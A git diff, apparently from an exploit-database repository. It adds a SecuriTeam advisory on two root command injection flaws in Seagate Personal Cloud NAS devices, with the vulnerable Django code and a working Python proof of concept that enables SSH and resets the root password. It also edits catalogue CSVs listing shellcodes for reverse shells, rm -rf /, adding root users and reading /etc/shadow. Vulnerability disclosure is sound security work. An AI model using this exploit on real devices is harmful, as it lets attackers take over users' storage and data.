diff --git a/exploits/hardware/remote/43659.md b/exploits/hardware/remote/43659.md new file mode 100644 index 000000000..56c3e484e --- /dev/null +++ b/exploits/hardware/remote/43659.md @@ -0,0 +1,134 @@ +# SSD Advisory – Seagate Personal Cloud Multiple Vulnerabilities + +## Vulnerabilities summary +The following advisory describes two (2) unauthenticated command injection vulnerabilities. + +Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.” + +## Credit +An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program + +## Vendor response +Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory + +## Vulnerabilities details +Seagate Media Server uses Django web framework and is mapped to the .psp extension. + +Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol. +/etc/lighttpd/conf.d/django-host.conf: + + +``` +fastcgi.server += ( +".psp"=> + (( + "socket" => "/var/run/manage_py-fastcgi.socket", + "check-local" => "disable", + "stream-post" => "enable", + "allow-x-send-file" => "enable", + )), +".psp/"=> + (( + "socket" => "/var/run/manage_py-fastcgi.socket", + "check-local" => "disable", + "stream-post" => "enable", + "allow-x-send-file" => "enable", + )) +) +``` + + +URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. + +Two views were found to be affected by unauthenticated command injection. + +The affected views are: + +- uploadTelemetry +- getLogs + +These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module. + +This allows an attacker to inject arbitrary system commands, that will be executed with root privileges. + +/usr/lib/django_host/seagate_media_server/views.py: + + +``` +@csrf_exempt +def uploadTelemetry(request): + ts = request.GET.get('TimeStamp','') + if (checkDBSQLite()) : + response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}' + else : + if ts == "": + response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}' + return HttpResponse(response); + cmd = "/usr/local/bin/log_telemetry "+str(ts) + commands.getoutput(cmd) + return HttpResponse('{"stat":"ok"}') +``` + + +/usr/lib/django_host/seagate_media_server/views.py: + + +``` +@csrf_exempt +def getLogs (request): + try: + cmd_base='/usr/bin/log-extract-manager.sh' + uID = request.GET.get ( 'arch_id', None ) + time_stamp = request.GET.get ( 'time_stamp', '' ) + + if uID: + (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID); + if ('In progress' in output) and (uID in output) : + return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}') + elif (status == 0) : + return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) )) + else : + return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' ) + else: + (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp); + if (status == 0) : + return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output)) + + return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' ) + except : + return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' ) +``` + + +Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery. + +### Proof of Concept +The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password. + + +``` +#!/usr/bin/env python +import os +import urllib + +scheme = 'http' +host = 'personalcloud.local' +port = '80' +path = 'uploadTelemetry.psp' +querystr = 'TimeStamp=%3b' +#path = 'getLogs.psp' +#querystr = 'time_stamp=%3b' +password = 'Welcome01' + +cmds = ['ngc --start sshd 2>&1', + 'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}] + +for cmd in cmds: + print 'Running command', repr(cmd) + cmd = urllib.quote_plus(cmd) + r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd)) + print r.read() + +print 'Log in with', password +os.system('ssh -p 2222 root@%s' % host) +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a24c2e4f2..8c16d0079 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5247,7 +5247,7 @@ id,file,description,date,author,type,platform,port 40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android, 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx, 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows, -43596,exploits/windows/dos/43596.py,"OBS studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows, +43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows, 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx, 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows, 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows, @@ -15813,6 +15813,7 @@ id,file,description,date,author,type,platform,port 43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows, 43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows, 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware, +43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware, 40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple, 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware, 40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 6b7d7c7bb..7af041d92 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1,47 +1,47 @@ id,file,description,date,author,type,platform 14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm -13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix +13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix 13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd -13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc -13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 +13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc +13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 -13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86 -13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86 +13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 -13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd -13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 -13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 -13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 -13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd +13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 +13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 +13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 +13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86 -13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86 +13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86 13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 -13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 +13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86 -13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86 -13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86 -13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86 +13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86 +13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86 +13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86 13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86 -13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86 -13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86 +13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 +13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86 13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64 -13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 -13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator +13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 +13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator 13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator 13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator -13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator +13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator 13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator 13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator 13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator @@ -50,27 +50,27 @@ id,file,description,date,author,type,platform 13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware 13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware 13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware -13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux +13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux 13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64 13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips -13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc -13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc +13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc 13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc 13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc -13307,shellcodes/linux_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86 +13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86 13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86 13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86 -13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86 -13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 -13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 +13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86 +13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 +13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86 13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86 -13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86 -13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86 +13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86 +13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86 13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86 13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 @@ -101,31 +101,31 @@ id,file,description,date,author,type,platform 13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86 13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86 13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86 -13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86 +13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86 13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 13350,shellcodes/linux_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 13351,shellcodes/linux_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86 -13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86 -13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86 +13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86 +13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86 13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86 13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 -13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 +13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 -13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 +13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86 13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86 -13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86 +13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86 13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86 13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator -13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86 